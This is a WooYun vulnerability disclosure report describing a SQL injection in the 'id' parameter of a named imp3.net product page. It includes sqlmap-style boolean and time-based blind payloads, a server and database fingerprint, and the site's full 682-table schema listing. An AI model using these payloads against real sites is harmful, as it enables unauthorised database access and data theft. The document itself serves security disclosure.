漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-045418
漏洞标题:敏感信息泄露#随身数码影音SQL注入漏洞
相关厂商:随身数码影音
漏洞作者: adm1n
提交时间:2013-12-09 19:29
修复时间:2014-01-23 19:30
公开时间:2014-01-23 19:30
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-12-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-23: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
随身影音SQL注入漏洞
详细说明:
1.http://product.imp3.net/product.php?id=7308
漏洞证明:
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=7308 AND 6729=6729
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=7308 AND SLEEP(5)
---
[11:07:47] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.8
back-end DBMS: MySQL 5.0.11
current user: 'imp3@192.168.0.11'
Database: imp3
[682 tables]
+---------------------------------------+
| admin_article_allow |
| admin_article_category |
| admin_article_category1 |
| admin_article_category2 |
| admin_article_category_ok |
| admin_article_content |
| admin_article_title |
| admin_common_admincp_cmenu |
| admin_common_admincp_group |
| admin_common_admincp_member |
| admin_common_admincp_perm |
| admin_common_admincp_session |
| admin_common_admingroup |
| admin_common_adminnote |
| admin_common_advertisement |
| admin_common_advertisement_custom |
| admin_common_banned |
| admin_common_block |
| admin_common_block_favorite |
| admin_common_block_item |
| admin_common_block_item_data |
| admin_common_block_permission |
| admin_common_block_pic |
| admin_common_block_style |
| admin_common_block_xml |
| admin_common_cache |
| admin_common_card |
| admin_common_card_log |
| admin_common_card_type |
| admin_common_connect_guest |
| admin_common_credit_log |
| admin_common_credit_log_field |
| admin_common_credit_rule |
| admin_common_credit_rule_log |
| admin_common_credit_rule_log_field |
| admin_common_cron |
| admin_common_devicetoken |
| admin_common_district |
| admin_common_diy_data |
| admin_common_domain |
| admin_common_failedlogin |
| admin_common_friendlink |
| admin_common_grouppm |
| admin_common_invite |
| admin_common_magic |
| admin_common_magiclog |
| admin_common_mailcron |
| admin_common_mailqueue |
| admin_common_member |
| admin_common_member_action_log |
| admin_common_member_connect |
| admin_common_member_count |
| admin_common_member_crime |
| admin_common_member_field_forum |
| admin_common_member_field_home |
| admin_common_member_forum_buylog |
| admin_common_member_grouppm |
| admin_common_member_log |
| admin_common_member_magic |
| admin_common_member_medal |
| admin_common_member_newprompt |
| admin_common_member_profile |
| admin_common_member_profile_setting |
| admin_common_member_security |
| admin_common_member_stat_field |
| admin_common_member_status |
| admin_common_member_validate |
| admin_common_member_verify |
| admin_common_member_verify_info |
| admin_common_myapp |
| admin_common_myinvite |
| admin_common_mytask |
| admin_common_nav |
| admin_common_onlinetime |
| admin_common_optimizer |
| admin_common_patch |
| admin_common_plugin |
| admin_common_pluginvar |
| admin_common_process |
| admin_common_regip |
| admin_common_relatedlink |
| admin_common_report |
| admin_common_searchindex |
| admin_common_secquestion |
| admin_common_session |
| admin_common_setting |
| admin_common_smiley |
| admin_common_sphinxcounter |
| admin_common_stat |
| admin_common_statuser |
| admin_common_style |
| admin_common_stylevar |
| admin_common_syscache |
| admin_common_tag |
| admin_common_tagitem |
| admin_common_task |
| admin_common_taskvar |
| admin_common_template |
| admin_common_template_block |
| admin_common_template_permission |
| admin_common_uin_black |
| admin_common_usergroup |
| admin_common_usergroup_field |
| admin_common_visit |
| admin_common_word |
| admin_common_word_type |
| admin_connect_disktask |
| admin_connect_feedlog |
| admin_connect_memberbindlog |
| admin_connect_postfeedlog |
| admin_connect_tthreadlog |
| admin_forum_access |
| admin_forum_activity |
| admin_forum_activityapply |
| admin_forum_announcement |
| admin_forum_attachment |
| admin_forum_attachment_0 |
| admin_forum_attachment_1 |
| admin_forum_attachment_2 |
| admin_forum_attachment_3 |
| admin_forum_attachment_4 |
| admin_forum_attachment_5 |
| admin_forum_attachment_6 |
| admin_forum_attachment_7 |
| admin_forum_attachment_8 |
| admin_forum_attachment_9 |
| admin_forum_attachment_exif |
| admin_forum_attachment_unused |
| admin_forum_attachtype |
| admin_forum_bbcode |
| admin_forum_collection |
| admin_forum_collectioncomment |
| admin_forum_collectionfollow |
| admin_forum_collectioninvite |
| admin_forum_collectionrelated |
| admin_forum_collectionteamworker |
| admin_forum_collectionthread |
| admin_forum_creditslog |
| admin_forum_debate |
| admin_forum_debatepost |
| admin_forum_faq |
| admin_forum_filter_post |
| admin_forum_forum |
| admin_forum_forum_threadtable |
| admin_forum_forumfield |
| admin_forum_forumrecommend |
| admin_forum_groupcreditslog |
| admin_forum_groupfield |
| admin_forum_groupinvite |
| admin_forum_grouplevel |
| admin_forum_groupuser |
| admin_forum_hotreply_member |
| admin_forum_hotreply_number |
| admin_forum_imagetype |
| admin_forum_medal |
| admin_forum_medallog |
| admin_forum_memberrecommend |
| admin_forum_moderator |
| admin_forum_modwork |
| admin_forum_newthread |
| admin_forum_onlinelist |
| admin_forum_order |
| admin_forum_poll |
| admin_forum_polloption |
| admin_forum_polloption_image |
| admin_forum_pollvoter |
| admin_forum_post |
| admin_forum_post_location |
| admin_forum_post_moderate |
| admin_forum_post_tableid |
| admin_forum_postcache |
| admin_forum_postcomment |
| admin_forum_postlog |
| admin_forum_poststick |
| admin_forum_promotion |
| admin_forum_ratelog |
| admin_forum_relatedthread |
| admin_forum_replycredit |
| admin_forum_rsscache |
| admin_forum_sofa |
| admin_forum_spacecache |
| admin_forum_statlog |
| admin_forum_thread |
| admin_forum_thread_moderate |
| admin_forum_threadaddviews |
| admin_forum_threadcalendar |
| admin_forum_threadclass |
| admin_forum_threadclosed |
| admin_forum_threaddisablepos |
| admin_forum_threadhot |
| admin_forum_threadimage |
| admin_forum_threadlog |
| admin_forum_threadmod |
| admin_forum_threadpartake |
| admin_forum_threadpreview |
| admin_forum_threadprofile |
| admin_forum_threadprofile_group |
| admin_forum_threadrush |
| admin_forum_threadtype |
| admin_forum_trade |
| admin_forum_tradecomment |
| admin_forum_tradelog |
| admin_forum_typeoption |
| admin_forum_typeoptionvar |
| admin_forum_typevar |
| admin_forum_warning |
| admin_home_album |
| admin_home_album_category |
| admin_home_appcreditlog |
| admin_home_blacklist |
| admin_home_blog |
| admin_home_blog_category |
| admin_home_blog_moderate |
| admin_home_blogfield |
| admin_home_class |
| admin_home_click |
| admin_home_clickuser |
| admin_home_comment |
| admin_home_comment_moderate |
| admin_home_docomment |
| admin_home_doing |
| admin_home_doing_moderate |
| admin_home_favorite |
| admin_home_feed |
| admin_home_feed_app |
| admin_home_follow |
| admin_home_follow_feed |
| admin_home_follow_feed_archiver |
| admin_home_friend |
| admin_home_friend_request |
| admin_home_friendlog |
| admin_home_notification |
| admin_home_pic |
| admin_home_pic_moderate |
| admin_home_picfield |
| admin_home_poke |
| admin_home_pokearchive |
| admin_home_share |
| admin_home_share_moderate |
| admin_home_show |
| admin_home_specialuser |
| admin_home_userapp |
| admin_home_userappfield |
| admin_home_visitor |
| admin_mobile_setting |
| admin_portal_article_content |
| admin_portal_article_count |
| admin_portal_article_moderate |
| admin_portal_article_related |
| admin_portal_article_title |
| admin_portal_article_trash |
| admin_portal_attachment |
| admin_portal_category |
| admin_portal_category_permission |
| admin_portal_comment |
| admin_portal_comment_moderate |
| admin_portal_rsscache |
| admin_portal_topic |
| admin_portal_topic_pic |
| admin_security_evilpost |
| admin_security_eviluser |
| admin_security_failedlog |
| article_content |
| article_title |
| auction_log |
| auction_msg |
| auction_product |
| equip_comment |
| equip_equip |
| equip_files |
| equip_mfr |
| equip_poll |
| equip_product |
| equip_trades |
| flow_accredit |
| flow_deal |
| flow_machines |
| forbid_username |
| game_egg_award |
| game_egg_log |
| game_egg_msg |
| game_robpost_name |
| game_robpost_rob |
| gps_data |
| gps_name |
| gps_photo |
| gps_poi |
| gps_track |
| imp3_accredit |
| imp3_admin |
| imp3_log |
| imp3_price |
| imp3_sales |
| imp3_sms |
| made_provide |
| pa_article |
| phpcms_admin |
| phpcms_ads |
| phpcms_ads_customer |
| phpcms_ads_linkman |
| phpcms_ads_pay |
| phpcms_ads_place |
| phpcms_ads_total |
| phpcms_area |
| phpcms_article |
| phpcms_article_1 |
| phpcms_article_10 |
| phpcms_article_13 |
| phpcms_article_14 |
| phpcms_article_2 |
| phpcms_article_data |
| phpcms_article_data_1 |
| phpcms_article_data_10 |
| phpcms_article_data_13 |
| phpcms_article_data_14 |
| phpcms_article_data_2 |
| phpcms_attachment |
| phpcms_author |
| phpcms_banip |
| phpcms_category |
| phpcms_category_bak |
| phpcms_channel |
| phpcms_city |
| phpcms_copyfrom |
| phpcms_field |
| phpcms_field_bak |
| phpcms_flow |
| phpcms_formguide |
| phpcms_formguide_data |
| phpcms_keylink |
| phpcms_keywords |
| phpcms_link |
| phpcms_log |
| phpcms_member |
| phpcms_member_group |
| phpcms_member_info |
| phpcms_menu |
| phpcms_module |
| phpcms_mytag |
| phpcms_position |
| phpcms_province |
| phpcms_reword |
| phpcms_sessions |
| phpcms_sms |
| phpcms_sms_box |
| phpcms_special |
| phpcms_teamup |
| phpcms_type |
| phpcms_vote_data |
| phpcms_vote_option |
| phpcms_vote_subject |
| phpcms_yp_order |
| phpcms_yp_trade |
| pre_common_addon |
| pre_common_admincp_cmenu |
| pre_common_admincp_group |
| pre_common_admincp_member |
| pre_common_admincp_perm |
| pre_common_admincp_session |
| pre_common_admingroup |
| pre_common_adminnote |
| pre_common_advertisement |
| pre_common_advertisement_custom |
| pre_common_banned |
| pre_common_block |
| pre_common_block_favorite |
| pre_common_block_item |
| pre_common_block_item_data |
| pre_common_block_permission |
| pre_common_block_pic |
| pre_common_block_style |
| pre_common_block_xml |
| pre_common_cache |
| pre_common_card |
| pre_common_card_log |
| pre_common_card_type |
| pre_common_connect_guest |
| pre_common_credit_log |
| pre_common_credit_rule |
| pre_common_credit_rule_log |
| pre_common_credit_rule_log_field |
| pre_common_cron |
| pre_common_district |
| pre_common_diy_data |
| pre_common_domain |
| pre_common_failedlogin |
| pre_common_friendlink |
| pre_common_grouppm |
| pre_common_invite |
| pre_common_magic |
| pre_common_magiclog |
| pre_common_mailcron |
| pre_common_mailqueue |
| pre_common_member |
| pre_common_member_action_log |
| pre_common_member_connect |
| pre_common_member_count |
| pre_common_member_crime |
| pre_common_member_field_forum |
| pre_common_member_field_home |
| pre_common_member_grouppm |
| pre_common_member_log |
| pre_common_member_magic |
| pre_common_member_medal |
| pre_common_member_phone |
| pre_common_member_phone_sms |
| pre_common_member_profile |
| pre_common_member_profile_setting |
| pre_common_member_security |
| pre_common_member_stat_field |
| pre_common_member_stat_fieldcache |
| pre_common_member_stat_search |
| pre_common_member_stat_searchcache |
| pre_common_member_status |
| pre_common_member_temp___ |
| pre_common_member_validate |
| pre_common_member_verify |
| pre_common_member_verify_info |
| pre_common_moderate |
| pre_common_myapp |
| pre_common_myinvite |
| pre_common_mytask |
| pre_common_nav |
| pre_common_onlinetime |
| pre_common_patch |
| pre_common_plugin |
| pre_common_pluginvar |
| pre_common_process |
| pre_common_regip |
| pre_common_relatedlink |
| pre_common_report |
| pre_common_searchindex |
| pre_common_secquestion |
| pre_common_session |
| pre_common_setting |
| pre_common_smiley |
| pre_common_sphinxcounter |
| pre_common_stat |
| pre_common_statuser |
| pre_common_style |
| pre_common_stylevar |
| pre_common_syscache |
| pre_common_tag |
| pre_common_tagitem |
| pre_common_task |
| pre_common_taskvar |
| pre_common_template |
| pre_common_template_block |
| pre_common_template_permission |
| pre_common_uin_black |
| pre_common_usergroup |
| pre_common_usergroup_field |
| pre_common_word |
| pre_common_word_type |
| pre_connect_disktask |
| pre_connect_feedlog |
| pre_connect_memberbindlog |
| pre_connect_tlog |
| pre_connect_tthreadlog |
| pre_filterword_log |
| pre_forum_access |
| pre_forum_activity |
| pre_forum_activityapply |
| pre_forum_announcement |
| pre_forum_attachment |
| pre_forum_attachment_0 |
| pre_forum_attachment_1 |
| pre_forum_attachment_2 |
| pre_forum_attachment_3 |
| pre_forum_attachment_4 |
| pre_forum_attachment_5 |
| pre_forum_attachment_6 |
| pre_forum_attachment_7 |
| pre_forum_attachment_8 |
| pre_forum_attachment_9 |
| pre_forum_attachment_exif |
| pre_forum_attachment_unused |
| pre_forum_attachtype |
| pre_forum_bbcode |
| pre_forum_collection |
| pre_forum_collectioncomment |
| pre_forum_collectionfollow |
| pre_forum_collectioninvite |
| pre_forum_collectionrelated |
| pre_forum_collectionteamworker |
| pre_forum_collectionthread |
| pre_forum_creditslog |
| pre_forum_debate |
| pre_forum_debatepost |
| pre_forum_faq |
| pre_forum_forum |
| pre_forum_forum_threadtable |
| pre_forum_forumfield |
| pre_forum_forumrecommend |
| pre_forum_groupcreditslog |
| pre_forum_groupfield |
| pre_forum_groupinvite |
| pre_forum_grouplevel |
| pre_forum_groupranking |
| pre_forum_groupuser |
| pre_forum_imagetype |
| pre_forum_medal |
| pre_forum_medallog |
| pre_forum_memberrecommend |
| pre_forum_moderator |
| pre_forum_modwork |
| pre_forum_onlinelist |
| pre_forum_optionvalue74 |
| pre_forum_optionvalue75 |
| pre_forum_optionvalue76 |
| pre_forum_optionvalue78 |
| pre_forum_order |
| pre_forum_poll |
| pre_forum_polloption |
| pre_forum_pollvoter |
| pre_forum_post |
| pre_forum_post_location |
| pre_forum_post_moderate |
| pre_forum_post_tableid |
| pre_forum_postcache |
| pre_forum_postcomment |
| pre_forum_postlog |
| pre_forum_postposition |
| pre_forum_poststick |
| pre_forum_promotion |
| pre_forum_ratelog |
| pre_forum_relatedthread |
| pre_forum_replycredit |
| pre_forum_rsscache |
| pre_forum_spacecache |
| pre_forum_statlog |
| pre_forum_thread |
| pre_forum_thread_moderate |
| pre_forum_threadaddviews |
| pre_forum_threadclass |
| pre_forum_threadclosed |
| pre_forum_threaddisablepos |
| pre_forum_threadimage |
| pre_forum_threadlog |
| pre_forum_threadmod |
| pre_forum_threadpartake |
| pre_forum_threadpreview |
| pre_forum_threadrush |
| pre_forum_threadtype |
| pre_forum_trade |
| pre_forum_tradecomment |
| pre_forum_tradelog |
| pre_forum_typeoption |
| pre_forum_typeoptionvar |
| pre_forum_typevar |
| pre_forum_warning |
| pre_home_album |
| pre_home_album_category |
| pre_home_appcreditlog |
| pre_home_blacklist |
| pre_home_blog |
| pre_home_blog_category |
| pre_home_blog_moderate |
| pre_home_blogfield |
| pre_home_class |
| pre_home_click |
| pre_home_clickuser |
| pre_home_comment |
| pre_home_comment_moderate |
| pre_home_docomment |
| pre_home_doing |
| pre_home_doing_moderate |
| pre_home_favorite |
| pre_home_feed |
| pre_home_feed_app |
| pre_home_follow |
| pre_home_follow_feed |
| pre_home_follow_feed_archiver |
| pre_home_friend |
| pre_home_friend_request |
| pre_home_friendlog |
| pre_home_notification |
| pre_home_pic |
| pre_home_pic_moderate |
| pre_home_picfield |
| pre_home_poke |
| pre_home_pokearchive |
| pre_home_share |
| pre_home_share_moderate |
| pre_home_show |
| pre_home_specialuser |
| pre_home_userapp |
| pre_home_userappfield |
| pre_home_viewlog |
| pre_home_visitor |
| pre_myrepeats |
| pre_plugin_dsurcdreport |
| pre_portal_article_content |
| pre_portal_article_count |
| pre_portal_article_moderate |
| pre_portal_article_related |
| pre_portal_article_title |
| pre_portal_article_trash |
| pre_portal_attachment |
| pre_portal_category |
| pre_portal_category_permission |
| pre_portal_comment |
| pre_portal_comment_moderate |
| pre_portal_rsscache |
| pre_portal_topic |
| pre_portal_topic_pic |
| pre_rmb_log |
| pre_security_evilpost |
| pre_security_eviluser |
| pre_security_failedlog |
| pre_sms_oksvn_com_black |
| pre_sms_oksvn_com_call |
| pre_sms_oksvn_com_deleted |
| pre_sms_oksvn_com_friend |
| pre_sms_oksvn_com_mo |
| pre_sms_oksvn_com_mobilearea |
| pre_sms_oksvn_com_mt |
| pre_sms_oksvn_com_notice |
| pre_sms_oksvn_com_temp |
| pre_sms_oksvn_com_user |
| pre_tools_censorhome |
| pre_tools_rule |
| pre_xwb_bind_info |
| pre_xwb_bind_thread |
| pre_xwb_session |
| prod_bbs |
| prod_comment |
| prod_comment_newmark |
| prod_commentstat |
| prod_count |
| prod_earphone |
| prod_earphone_comment |
| prod_earphone_comment_newmark |
| prod_earphone_commentstat |
| prod_earphone_error_reporting |
| prod_earphone_images |
| prod_error_reporting |
| prod_images |
| prod_mfr |
| prod_product |
| promotion_wenxuan |
| qd_admin |
| qd_adminlog |
| qd_fac |
| qd_fac_manufacture |
| qd_loginlog |
| qd_manufacture |
| qd_manufacture_messages |
| qd_manufacture_product |
| qd_research |
| qd_topitem |
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pm_indexes |
| uc_pm_lists |
| uc_pm_members |
| uc_pm_messages_0 |
| uc_pm_messages_1 |
| uc_pm_messages_2 |
| uc_pm_messages_3 |
| uc_pm_messages_4 |
| uc_pm_messages_5 |
| uc_pm_messages_6 |
| uc_pm_messages_7 |
| uc_pm_messages_8 |
| uc_pm_messages_9 |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
+---------------------------------------+
Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
修复方案:
过滤
亲,有礼物么......
版权声明:转载请注明来源 adm1n@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝